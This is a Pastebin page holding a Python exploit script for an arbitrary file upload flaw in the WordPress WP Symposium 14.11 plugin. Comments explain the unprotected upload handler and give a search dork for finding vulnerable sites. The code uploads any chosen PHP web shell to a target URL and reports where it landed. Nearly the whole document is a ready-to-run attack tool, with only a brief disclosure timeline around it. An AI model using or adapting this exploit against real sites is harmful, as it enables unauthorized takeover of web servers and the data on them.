Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #
- # Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
- #
- #
- # Vulnerability discovered by Claudio Viviani
- #
- # Exploit written by Claudio Viviani
- #
- #
- # 2014-11-27: Discovered vulnerability
- # 2014-12-01: Vendor Notification (Twitter)
- # 2014-12-02: Vendor Notification (Web Site)
- # 2014-12-04: Vendor Notification (E-mail)
- # 2014-12-11: No Response/Feedback
- # 2014-12-11: Published
- #
- # Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
- #
- # --------------------------------------------------------------------
- #
- # The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
- #
- # if ($_FILES["file"]["error"] > 0) {
- # echo "Error: " . $_FILES["file"]["error"] . "<br>";
- # } else {
- # $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
- # //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
- # $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
- # //echo "Extension: " . $ext . "<br />";
- # if (strpos($allowedExts, $ext)) {
- # $extAllowed = true;
- # } else {
- # $extAllowed = false;
- # }
- # //echo "Type: " . $_FILES["file"]["type"] . "<br>";
- # //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
- # //echo "Stored in: " . $_FILES["file"]["tmp_name"];
- #
- # if (!$extAllowed) {
- # echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
- # } else {
- # // Copy file to tmp location
- # ...
- # ...
- # ...
- #
- # BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
- #
- # The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
- #
- # ---------------------------------------------------------------------
- #
- # Dork google: index of "wp-symposium"
- #
- #
- # Tested on BackBox 3.x with python 2.6
- #
- # Http connection
- import urllib, urllib2, socket
- #
- import sys
- # String manipulator
- import string, random
- # Args management
- import optparse
- # File management
- import os, os.path, mimetypes
- # Check url
- def checkurl(url):
- if url[:8] != "https://" and url[:7] != "http://":
- print('[X] You must insert http:// or https:// procotol')
- sys.exit(1)
- else:
- return url
- # Check if file exists and has readable
- def checkfile(file):
- if not os.path.isfile(file) and not os.access(file, os.R_OK):
- print '[X] '+file+' file is missing or not readable'
- sys.exit(1)
- else:
- return file
- # Get file's mimetype
- def get_content_type(filename):
- return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
- def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
- return ''.join(random.choice(chars) for _ in range(size))
- # Create multipart header
- def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
- getfields = dict()
- getfields['uploader_uid'] = '1'
- getfields['uploader_dir'] = './'+randDirName
- getfields['uploader_url'] = url_symposium_upload
- payloadcontent = open(payloadname).read()
- LIMIT = '----------lImIt_of_THE_fIle_eW_$'
- CRLF = '\r\n'
- L = []
- for (key, value) in getfields.items():
- L.append('--' + LIMIT)
- L.append('Content-Disposition: form-data; name="%s"' % key)
- L.append('')
- L.append(value)
- L.append('--' + LIMIT)
- L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
- L.append('Content-Type: %s' % get_content_type(payloadname))
- L.append('')
- L.append(payloadcontent)
- L.append('--' + LIMIT + '--')
- L.append('')
- body = CRLF.join(L)
- return body
- banner = """
- ___ ___ __
- | Y .-----.----.--| .-----.----.-----.-----.-----.
- |. | | _ | _| _ | _ | _| -__|__ --|__ --|
- |. / \ |_____|__| |_____| __|__| |_____|_____|_____|
- |: | |__|
- |::.|:. |
- `--- ---'
- ___ ___ _______ _______ __
- | Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
- |. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
- |. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
- |: |: | |: 1 |_____| |__|
- |::.|:. |::.| |::.. . |
- `--- ---`---' `-------'
- Wp-Symposium
- Sh311 Upl04d Vuln3r4b1l1ty
- v14.11
- Written by:
- Claudio Viviani
- http://www.homelab.it
- info@homelab.it
- homelabit@protonmail.ch
- https://www.facebook.com/homelabit
- https://twitter.com/homelabit
- https://plus.google.com/+HomelabIt1/
- https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
- """
- commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
- commandList.add_option('-t', '--target', action="store",
- help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
- )
- commandList.add_option('-f', '--file', action="store",
- help="Insert file name, ex: shell.php",
- )
- commandList.add_option('--timeout', action="store", default=10, type="int",
- help="[Timeout Value] - Default 10",
- )
- options, remainder = commandList.parse_args()
- # Check args
- if not options.target or not options.file:
- print(banner)
- commandList.print_help()
- sys.exit(1)
- payloadname = checkfile(options.file)
- host = checkurl(options.target)
- timeout = options.timeout
- print(banner)
- socket.setdefaulttimeout(timeout)
- url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
- content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
- randDirName = id_generator()
- randShellName = id_generator()
- bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
- headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'content-type': content_type,
- 'content-length': str(len(bodyupload)) }
- try:
- req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
- response = urllib2.urlopen(req)
- read = response.read()
- if "error" in read or read == "0" or read == "":
- print("[X] Upload Failed :(")
- else:
- print("[!] Shell Uploaded")
- print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
- except urllib2.HTTPError as e:
- print("[X] "+str(e))
- except urllib2.URLError as e:
- print("[X] Connection Error: "+str(e))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement